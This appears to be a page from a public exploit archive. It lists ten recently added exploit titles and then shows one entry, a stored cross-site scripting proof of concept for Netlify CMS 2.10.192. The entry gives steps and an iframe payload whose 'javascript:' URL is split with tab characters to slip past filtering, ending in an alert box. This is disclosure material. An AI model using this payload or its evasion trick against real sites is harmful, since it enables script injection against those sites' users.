00f5021452
10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
17 lines
No EOL
516 B
Text
17 lines
No EOL
516 B
Text
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
|
|
# Exploit Author: tmrswrr
|
|
# Vendor Homepage: https://decapcms.org/docs/intro/
|
|
# Software Link: https://github.com/decaporg/decap-cms
|
|
# Version: 2.10.192
|
|
# Tested on: https://cms-demo.netlify.com
|
|
|
|
|
|
Description:
|
|
|
|
1. Go to new post and write body field your payload:
|
|
|
|
https://cms-demo.netlify.com/#/collections/posts
|
|
|
|
Payload = <iframe src=java	sc	ript:al	ert()></iframe>
|
|
|
|
2. After save it XSS payload will executed and see alert box |